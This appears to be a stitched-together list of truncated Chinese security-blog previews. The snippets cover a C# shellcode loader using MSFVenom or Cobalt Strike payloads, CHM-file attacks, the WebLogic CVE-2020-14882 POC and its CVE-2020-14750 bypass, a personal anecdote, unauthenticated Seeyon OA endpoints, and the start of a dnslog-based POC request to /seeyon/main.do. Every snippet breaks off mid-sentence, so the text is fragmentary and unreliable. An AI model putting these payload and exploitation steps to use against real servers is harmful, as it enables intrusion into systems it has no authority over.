环境:Language: C#.NET Framework 4.0Visual Studio 2019 (community)Build Architecture: x64Shell Code: MSFVenom windows/exec x32 或者 Cobal Strike x32生成Paylo
CHM文件是各种内容的压缩编译,例如HTML文档,图像和脚本/ Web相关的编程语言,如VBA,JScript,Java和ActiveX。内容使用HTML Help executable program(hh.exe)加载的Internet Explorer浏览器基础组件显示。 攻击者
影响版本WebLogic 10.3.6.0.0WebLogic 12.1.3.0.0WebLogic 12.2.1.3.0WebLogic 12.2.1.4.0WebLogic 14.1.1.0.0需要出网环境配合cve-2020-14882 POC 同样可以配合cve-2020-14750绕过进控
最近跟高中同学吃饭,偶然听到他前不久去拜访过我们的高中老师。然后老师还特意问起了我现在在干嘛什么的,老师说她收到过一份感谢信,感谢培养出这么优秀的人七七八八的。让我有些吃惊,我感觉应该是大学或者哪场HVV比赛发的吧,但是还是让我有些小欣喜!让别人能为你骄傲其实这也能成为让我不断努力学习的动力,最近有
这个POC很早有人放出来了,但是大HW被人提交成了0day。其实19年htmlofficeservlet出来的时候,就肯定有人去分析了那几个接口。主要写在WEB.XML里面的servlet就那几个,但是其实这三个只是可以未授权访问,但是除了htmlofficeservlet以外,其他两个都需要认证后
一个是需要认证的任意文件上传,并且还有个编码问题。今天重新看了下,发现还真有个无需认证的。日,太傻了。
1.打开http://www.dnslog.cn/点击GetSubDomain按钮后,下方会出现一个域名。2.复制域名,在下方代码中替换。POST/seeyon/main.do?method=changeLocaleHTTP/1.1Host:xxx.xxx.xxx.xxxContent-Length